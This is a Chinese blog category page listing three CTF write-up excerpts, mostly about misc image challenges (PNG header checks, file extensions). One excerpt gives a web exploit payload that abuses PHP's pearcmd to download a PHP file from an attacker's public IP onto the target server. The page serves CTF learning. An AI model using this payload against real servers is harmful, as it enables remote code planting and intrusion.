随笔分类 -  CTF

摘要:* misc11: 没有头绪,看了网上大佬的一些思路,受益匪浅,和大家分享下。 1.解压zip文件,用winhex打开misc11.png 2.判断文件格式是否篡改,检查png的文件头和文件尾,文件格式正常 PNG文件头(hex):89 50 4e 47 0d 0a 1a 0a PNG文件尾(hex 阅读全文
posted @ 2023-08-30 09:14 芝士奶绿 阅读(239) 评论(0) 推荐(0)
摘要:* 源代码 ``` ``` * 解法 借助代码执行和字符串输出的区别进行延迟触发。 payload: http://url.challenge.ctf.show/?c=pearcmd&+download+http://公网IP/1.php 1.php: `"; ?>` 上传成功后显示: ``` do 阅读全文
posted @ 2023-08-29 15:55 芝士奶绿 阅读(1070) 评论(0) 推荐(0)
摘要:小提示:需要从图片上提取flag文字,可以通过截图翻译或者微信发送图片,这两个的ai图像识别挺好用的。 misc1: 解压打开就能看见flag,提取出来就行 misc2: 记事本打开,看见 ng字符,尝试更改后缀为.png,重新打开看见flag misc3: 题目为bpg文件,使用一些看图软件可以打 阅读全文
posted @ 2023-08-28 15:50 芝士奶绿 阅读(120) 评论(0) 推荐(0)